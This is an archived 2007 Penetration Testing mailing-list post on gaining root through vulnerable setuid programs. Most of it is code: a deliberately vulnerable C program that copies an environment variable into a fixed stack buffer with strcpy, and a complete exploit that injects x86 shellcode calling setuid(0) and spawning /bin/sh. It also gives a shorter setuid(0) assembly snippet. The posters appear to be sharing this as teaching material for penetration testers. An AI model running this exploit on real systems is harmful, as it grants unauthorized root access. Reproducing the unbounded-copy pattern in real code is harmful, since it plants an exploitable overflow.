Penetration Testing mailing list archives

Re: question on escalating privileges via suid vulnerabilities
From: "John McGuire" <jmcguire81 () gmail com>
Date: Wed, 28 Feb 2007 12:20:43 -0700

Here is the assembly I finally came up with for this. It shaves off a
byte if space is critical:

//setuid(0), Opcode 17
"\x31\xdb"                      // xorl         %ebx,%ebx
"\x8d\x43\x17"                  // leal         0x17(%ebx),%eax  // eax = ebx + 0x17
"\xcd\x80"                      // int          $0x80


John



On 2/27/07, Fábio Russo <fabio.contin.russo () gmail com> wrote:

>Try with "setuid(0);" before execve :-)
>--
>Andrea "bunker" Purificato
>+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
>++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
>
>http://rawlab.mindcreations.com

Hi.
Some applications need a setuid(0) before the /bin/sh string because
it has the suid bit set.
See the example below:

// bugged program with setuid bit set and root privileges:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char env[96];

    // Shows the return address for exploiting
    printf("- %p -\n", &env);
    strcpy(env, getenv("BOLINHA"));   // unbounded copy into a 96-byte stack buffer
    return(0);
}



//exploit: usage ./exploit <bugged_program> <return addr>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;
char
shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
  char string_longa[128];
  long *ptr = (long *) string_longa;
  int i;

  for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16);
  for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i];

  setenv("BOLINHA", string_longa, 1);
  execle(argv[1], argv[1], NULL, environ);
  printf("%s\n", string_longa);

  return (0);
}

Taking a close look at the exploit source code we can see that
the first bytes in the shellcode are the setuid(0),
more precisely the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
This is needed to get a root shell.
If you cut those bytes off from the shellcode, you will get a shell
that belongs to the user who executed the exploit.

I hope it can be useful for someone. :-)

bye.

